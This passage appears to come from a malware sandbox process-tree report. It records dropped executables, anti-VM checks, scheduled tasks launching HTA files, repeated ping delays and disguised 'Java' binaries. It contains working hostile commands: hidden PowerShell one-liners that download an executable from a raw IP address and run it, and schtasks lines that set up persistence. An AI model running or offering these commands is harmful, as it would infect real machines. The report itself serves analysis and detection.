        C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Java Platform SE javapluginw.exe"
        7⤵
        Modifies registry key
        
        PID:23788
- - C:\Users\Admin\AppData\Local\Temp\10361840101\83e62028e7.exe
    "C:\Users\Admin\AppData\Local\Temp\10361840101\83e62028e7.exe"
    3⤵
    PID:12376
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10361840101\83e62028e7.exe"
      4⤵
      PID:29608
- - C:\Users\Admin\AppData\Local\Temp\10361850101\a5272784ca.exe
    "C:\Users\Admin\AppData\Local\Temp\10361850101\a5272784ca.exe"
    3⤵
    PID:17148
  - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
      "C:\Users\Admin\AppData\Local\Temp\10361850101\a5272784ca.exe"
      4⤵
      PID:26244
- - C:\Users\Admin\AppData\Local\Temp\10361860101\72e6c3114c.exe
    "C:\Users\Admin\AppData\Local\Temp\10361860101\72e6c3114c.exe"
    3⤵
    PID:27136
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:25924
- - C:\Users\Admin\AppData\Local\Temp\10361870101\95019a06be.exe
    "C:\Users\Admin\AppData\Local\Temp\10361870101\95019a06be.exe"
    3⤵
    PID:13104
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn yTGSkmaAaxF /tr "mshta C:\Users\Admin\AppData\Local\Temp\pzwRhWFlY.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      PID:23072
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn yTGSkmaAaxF /tr "mshta C:\Users\Admin\AppData\Local\Temp\pzwRhWFlY.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:11584
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\pzwRhWFlY.hta
      4⤵
      PID:23016
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'KPSMW7ZZK54YT7C0AALIS8EWHG8DD2QQ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10636
      - C:\Users\Admin\AppData\Local\TempKPSMW7ZZK54YT7C0AALIS8EWHG8DD2QQ.EXE
        
        "C:\Users\Admin\AppData\Local\TempKPSMW7ZZK54YT7C0AALIS8EWHG8DD2QQ.EXE"
        6⤵
        
        PID:22492
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10361880121\am_no.cmd" "
    3⤵
    PID:29764
  - - C:\Windows\SysWOW64\timeout.exe
      timeout /t 2
      4⤵
      Delays execution with timeout.exe
      PID:30360
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
      4⤵
      PID:22520
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2140
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
      4⤵
      PID:21984
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:22808
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
      4⤵
      PID:18684
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:17956
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn "qniDmmafEUB" /tr "mshta \"C:\Temp\FEuIk4v18.hta\"" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:18480
  - - C:\Windows\SysWOW64\mshta.exe
      mshta "C:\Temp\FEuIk4v18.hta"
      4⤵
      PID:18428
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:21488
      - C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        6⤵
        
        PID:28888

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:4968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}
1⤵
PID:2860

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 5140 -ip 5140
1⤵
PID:6552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{b8e6e47f-a34d-4bf5-934a-244b2ce54ace}\9bc6a6a9-4071-49a3-b7eb-e4077b3287f2.cmd"
1⤵
PID:12824
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13612
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13744
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:13884
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13936
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:4812
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:2936
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:14032
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:14128
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:5156
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:5200
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4868
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:5340
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5384
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5424
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5452
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5484
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5528
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5548
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5580
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:5616
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5664
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5692
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5720
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:1148
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5772
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:460
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5936
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5964
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5984
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:6044
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:6140
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:536
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6152
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6192
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6220
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6244
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6288
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6340
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6372
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6420
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6448
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:6484
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6532
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:6600
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6628
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:6712
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:6756
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6784
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3144
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:6876
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6916
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6952
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:6984
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7032
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7072
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7116
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7132
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7152
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:4576
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:1528
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4532
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7240
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:7276
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7324
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7372
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7428
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7492
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7556
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:3980
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7932
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8032
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:8112
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8176
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:2864
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8244
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8304
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8344
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8396
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8444
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:8528
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8620
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8692
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10044
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7576
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:8988
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:9136
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9772
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11540
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9808
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11288
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:2612
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12088
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13912
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5968
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6576
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:1528
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8104
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9100
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9928
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:10380
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10620
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10756
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5140
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10992
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10916
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11252
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:12584
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:2084
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7004
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7548
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:8716
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:9036
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11572
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:11484
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10424
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:14000
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:13024
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11312
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5260
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5744
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:2840
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7824
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9644
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:4088
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:3912
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5688
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:5984
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6368
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6452
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9444
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7104
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7204
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:6164
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9520
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10896
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10872
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9920
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:10108
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10888
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5440
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:11492
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:12696
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:12772
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:12904
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5192
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:5232
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:5880
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:5152
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:1152
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:2740
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:720
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13496
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:13512
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:948
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:8984
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:11652
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13088
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:4924
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5980
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:6160
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:3948
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:6480
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:5792
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:14288
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:6344
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7316
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:7460
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7480
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7292
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7840
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10232
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:7608
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:10268
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7892
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8056
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:7784
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:8484
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  PID:13576
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:13840
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:10424
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:12196
- C:\Windows\system32\PING.EXE
  ping 127.0.0.1 -n 1
  2⤵
  - Runs ping.exe
  PID:9980

C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
1⤵
PID:8280

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
PID:8424

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe"
1⤵
PID:9036
- C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
  C:\Users\Admin\AppData\Roaming\Oracle\javaruntime_platform.exe
  2⤵
  PID:9148
- - C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
    C:\Users\Admin\AppData\Roaming\Oracle\javaplugin_service.exe
    3⤵
    PID:9252
  - - C:\Users\Admin\AppData\Roaming\Oracle\javaupdater.exe
